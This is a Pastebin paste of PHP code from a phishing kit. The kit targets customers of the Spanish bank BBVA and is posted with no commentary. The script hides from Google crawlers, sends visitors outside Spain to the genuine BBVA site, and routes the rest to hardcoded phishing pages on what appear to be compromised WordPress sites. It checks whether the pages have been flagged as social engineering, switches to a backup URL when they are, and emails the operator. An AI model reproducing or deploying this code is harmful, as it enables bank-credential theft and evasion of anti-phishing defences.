Advertisement
dragondevile

creative

Mar 28th, 2019
471
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.49 KB | None | 0 0
  1. error_reporting(0);
  2. if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
  3. if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
  4. ########################################
  5. $scam1 = 'https://eastsidesantorini.com/wp-admin/js/items/'; //http://oxaney.com
  6. $scam2 = 'https://itbikes.ec/wp-content/plugins/items/';
  7. ########################################
  8. $aa = '0'; // Auto Redirecting
  9. $gg = '0'; // check scam if you remove
  10. $cc = '0'; // Random check flagged
  11. $bb = '0'; // block all ip without spain
  12. ########################################
  13. ########################################
  14. $header = 'https://www.bbva.es/eng/particulares/index.jsp';
  15. ########################################
  16. include "antibots1.php";
  17. include "antibots2.php";
  18. include "antibots3.php";
  19. function request($scam) {
  20. $st = curl_init();
  21. curl_setopt($st,CURLOPT_URL,'https://aw-snap.info/utilities/is-flagged.php?url='.base64_encode($scam).'%3D~enc');
  22. curl_setopt($st, CURLOPT_RETURNTRANSFER, true);
  23. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  24. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  25. $data = curl_exec($st); //print $data;
  26. curl_close($st);
  27. return $data;
  28. }
  29. function get($zaba) {
  30. $st = curl_init();
  31. curl_setopt($st,CURLOPT_URL,$zaba);
  32. curl_setopt($st, CURLOPT_RETURNTRANSFER, true);
  33. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
  34. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
  35. $ok = curl_exec($st);
  36. curl_close($st);
  37. return $ok;
  38. }
  39. if($aa == 1 ){
  40. if($bb == 1 ){
  41. $ip  = getenv("REMOTE_ADDR"); #'91.142.217.133';
  42. $ip_data = @json_decode(get("http://www.geoplugin.net/json.gp?ip=".$ip));
  43. $dexter = $ip_data->geoplugin_countryCode;
  44. if(!eregi("ES",$dexter)){
  45. header("location: ".$header."");
  46. break;
  47. }  
  48. }  
  49. if($cc == 1 ){
  50. if($gg == 1 ){
  51. if(!file_exists("removed.txt")) {  
  52. if(!preg_match_all('#1f3870be274f6c49b3e31a0c6728957f#',get($scam1."/robots.txt"))){
  53. mail($mail,"Report Removed - ".rand(),"link it's removed in the time ".date("h:i:sa"));
  54. fopen("removed.txt", "ab");
  55. header("location: $scam2");
  56. break;
  57. }
  58. }
  59. else{
  60. header("location: $scam2");
  61. break;     
  62. }
  63. }
  64. if(!file_exists("detected.txt")) {
  65. if(rand(1, 4) == 2 ){
  66. if(preg_match_all('#<strong>NOT</strong> currently flagged.</p>#',request($scam1))){
  67. header("location: $scam1");
  68. }
  69. elseif(preg_match_all('#<strong>SOCIAL_ENGINEERING</strong>#',request($scam1))){
  70. mail($mail,"Report Phishing - ".rand(),"link deceptive in the time ".date("h:i:sa"));
  71. fopen("detected.txt", "ab");
  72. header("location: $scam2");
  73. }
  74. }  
  75. else{
  76. header("location: $scam1");    
  77. }
  78. }
  79. else{
  80. header("location: $scam2");    
  81. }
  82. break;
  83. }
  84. ##########
  85. if($gg == 1 ){
  86. if(!file_exists("removed.txt")) {  
  87. if(!preg_match_all('#1f3870be274f6c49b3e31a0c6728957f#',get($scam1."/robots.txt"))){
  88. mail($mail,"Report Removed - ".rand(),"link it's removed in the time ".date("h:i:sa"));
  89. fopen("removed.txt", "ab");
  90. header("location: $scam2");
  91. break;
  92. }
  93. }
  94. else{
  95. header("location: $scam2");
  96. break; 
  97. }
  98. }
  99. if(!file_exists("detected.txt")) {
  100. if(preg_match_all('#<strong>NOT</strong> currently flagged.</p>#',request($scam1))){
  101. header("location: $scam1");
  102. }
  103. elseif(preg_match_all('#<strong>SOCIAL_ENGINEERING</strong>#',request($scam1))){
  104. mail($mail,"Report Phishing - ".rand(),"link deceptive in the time ".date("h:i:sa"));
  105. fopen("detected.txt", "ab");
  106. header("location: $scam2");
  107. }
  108. }
  109. else{
  110. header("location: $scam2");    
  111. }
  112. }
  113. else{
  114. header("location: $scam2");
  115. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement